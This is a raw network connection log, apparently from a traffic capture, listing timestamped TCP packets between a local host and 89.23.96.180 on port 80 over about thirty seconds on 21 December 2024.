Dec 21, 2024 10:03:04.310667038 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:04.359221935 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.544081926 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:04.593683004 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.666834116 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.667134047 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.789455891 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:04.789530993 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.789721012 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.789762020 CET	80	49832	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:04.789822102 CET	49832	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:04.909142017 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.140408993 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.260047913 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.260139942 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.260159016 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.719379902 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.719636917 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.839020014 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.839570045 CET	80	49833	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.839680910 CET	49833	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.839688063 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.846609116 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:05.968043089 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:05.975554943 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:06.095195055 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.095731974 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:06.096024990 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:06.202867031 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:06.215563059 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.323332071 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.323554039 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.452903986 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:06.572550058 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.572616100 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:06.572662115 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.216780901 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.265414953 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.456120014 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.472363949 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.499684095 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.515326977 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.708254099 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.749819040 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.823257923 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.823514938 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.823559999 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.943115950 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.943228006 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.943351030 CET	80	49839	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.943376064 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.943425894 CET	49839	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:07.943835020 CET	80	49840	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:07.943902969 CET	49840	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:08.063003063 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:08.296780109 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:08.416475058 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:08.416512966 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:08.416542053 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:09.319072962 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:09.374779940 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:09.553232908 CET	80	49846	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:09.593427896 CET	49846	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:09.666773081 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:09.786410093 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:09.786498070 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:09.786612988 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:09.906198025 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:10.140436888 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:10.262075901 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:10.262175083 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:10.262206078 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.164343119 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.218427896 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.405324936 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.452836037 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.527240038 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.527319908 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.646924019 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.647021055 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.647093058 CET	80	49852	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.647157907 CET	49852	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.647213936 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:11.767465115 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:11.999799967 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.119699955 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.119736910 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.119771004 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.469310045 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.469552994 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.588900089 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.588999033 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.589409113 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.612932920 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.632473946 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.685060024 CET	80	49858	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.685143948 CET	49858	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.709202051 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.732692957 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.732773066 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.732861996 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:12.852319956 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:12.937417030 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:13.059310913 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:13.061161041 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:13.077872038 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:13.199512005 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:13.199547052 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:13.199582100 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:13.966227055 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.015341043 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.110999107 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.155949116 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.200320005 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.249716043 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.345910072 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.390331030 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.467483044 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.467485905 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.467873096 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.587522984 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.587622881 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.587723017 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.587765932 CET	80	49860	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.587826967 CET	49860	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.588404894 CET	80	49859	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.588460922 CET	49859	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:14.707521915 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:14.937371969 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:15.057080030 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:15.057145119 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:15.057177067 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:15.964498997 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.015352011 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.200102091 CET	80	49866	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.249737024 CET	49866	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.326572895 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.449949980 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.450052023 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.450193882 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.569722891 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.796677113 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:16.916764975 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.916802883 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:16.916846991 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:17.826412916 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:17.874804974 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.060036898 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.109160900 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.183995962 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.184309959 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.303944111 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.304040909 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.304105997 CET	80	49872	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.304194927 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.304195881 CET	49872	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.426244974 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.656219959 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:18.775969028 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.776082039 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:18.776132107 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.203727007 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.203865051 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.323478937 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.323554993 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.323671103 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.326740980 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.343398094 CET	80	49878	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.343470097 CET	49878	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.443284988 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.446321964 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.446494102 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.446525097 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.566180944 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.671624899 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.791382074 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.791589022 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.796644926 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:19.916357040 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.916392088 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:19.916444063 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:20.702681065 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:20.749713898 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:20.822717905 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:20.874744892 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:20.936233044 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:20.984096050 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.056458950 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.109152079 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.184240103 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.184305906 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.184602022 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.304394007 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.304562092 CET	80	49879	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.304564953 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.304636955 CET	80	49880	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.304656982 CET	49879	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.304739952 CET	49880	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.304965019 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.424523115 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.656048059 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:21.776134014 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.776191950 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:21.776221037 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:22.681952953 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:22.734075069 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:22.916294098 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:22.970649958 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.060086966 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.061633110 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.180305004 CET	80	49886	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:23.180430889 CET	49886	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.181348085 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:23.181444883 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.181540012 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.301127911 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:23.531157970 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:23.650885105 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:23.650949001 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:23.650980949 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:24.572820902 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:24.624813080 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:24.792654037 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:24.843614101 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:24.916884899 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:24.917042971 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.037240982 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.037338018 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.037494898 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.037602901 CET	80	49892	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.037795067 CET	49892	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.157147884 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.391743898 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.511702061 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.511723042 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.511737108 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:25.938117981 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:25.938179016 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.057867050 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.057976961 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.058182001 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.077157974 CET	80	49898	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.077245951 CET	49898	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.104302883 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.177721024 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.224108934 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.225240946 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.225400925 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.347208977 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.406065941 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.527515888 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.527527094 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.577965021 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:26.698256969 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.698328018 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:26.698338985 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:27.438586950 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:27.484102011 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.602607965 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:27.655967951 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.672333002 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:27.718463898 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.837593079 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:27.890322924 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.966274023 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.966556072 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:27.966638088 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.086496115 CET	80	49899	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.086617947 CET	49899	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.087227106 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.087300062 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.087357998 CET	80	49900	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.087412119 CET	49900	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.087495089 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.208982944 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.437304974 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:28.557157040 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.557193041 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:28.557224035 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:29.468010902 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:29.515424967 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:29.700345039 CET	80	49906	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:29.749727011 CET	49906	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:29.828243971 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:29.949557066 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:29.949911118 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:29.950001001 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:30.070261955 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:30.296660900 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:30.416455030 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:30.416466951 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:30.416593075 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:31.326145887 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:31.374726057 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.560184956 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:31.609199047 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.685281992 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.685564041 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.806315899 CET	80	49912	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:31.806411982 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:31.806422949 CET	49912	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.806502104 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.806632042 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:31.926287889 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.200653076 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.321664095 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.321717978 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.321746111 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.688066959 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.688165903 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.807899952 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.807991028 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.807991028 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.808115959 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.845385075 CET	80	49918	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.845459938 CET	49918	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.927803040 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.927822113 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:32.927896976 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:32.928050041 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:33.047696114 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:33.156048059 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:33.275643110 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:33.275758982 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:33.281277895 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:33.401021004 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:33.401037931 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:33.401052952 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.186583996 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.234114885 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.305059910 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.348037958 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.420625925 CET	80	49919	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.468559027 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.540568113 CET	80	49920	89.23.96.180	192.168.2.5
Dec 21, 2024 10:03:34.593483925 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.667234898 CET	49919	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.667309046 CET	49920	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.667612076 CET	49926	80	192.168.2.5	89.23.96.180
Dec 21, 2024 10:03:34.787733078 CET	80	49926	89.23.96.180	192.168.2.5
